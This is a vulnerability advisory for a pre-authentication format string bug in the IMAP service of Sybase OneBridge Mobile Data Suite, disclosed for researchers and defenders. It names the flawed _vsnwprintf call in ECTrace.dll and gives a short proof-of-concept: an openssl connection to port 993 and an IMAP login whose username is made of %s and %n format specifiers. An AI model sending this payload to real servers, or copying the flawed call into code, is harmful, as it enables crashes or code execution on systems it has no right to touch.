#######################################################################

                             Luigi Auriemma

Application:  Sybase OneBridge Mobile Data Suite
              http://www.sybase.com/products/allproductsa-z/onebridge
Versions:     <= 5.6
Platforms:    Windows
Bug:          format string in SMTP and IMAP services (ECTrace.dll)
Exploitation: remote, versus server
Date:         probably found 02 Nov 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


???


#######################################################################

======
2) Bug
======


The SMTP and IMAP services (iMailGatewayService) listening on the SSL
ports 587 and 993 are affected by a format string vulnerability located
in ECTrace.dll that calls _vsnwprintf without a format argument:

  _vsnwprintf(buffer, 3071, log_string);

where "log_string" can be
"[IMAPService.OnAuthenticateUser] (User=%s%s%n%s%s%n%s%s%n)" if the
vulnerability is exploitated in pre-auth by supplying a malformed
username to the IMAP service.

The vulnerable dll is used by both the SMTP and IMAP services anyway I
found only the second one vulnerable in pre-auth (STMP requires login
too).


#######################################################################

===========
3) The Code
===========


openssl s_client -connect SERVER:993

then type:
A001 login %s%s%n%s%s%n%s%s%n mypass


#######################################################################

======
4) Fix
======


http://www.zerodayinitiative.com/advisories/ZDI-11-171


#######################################################################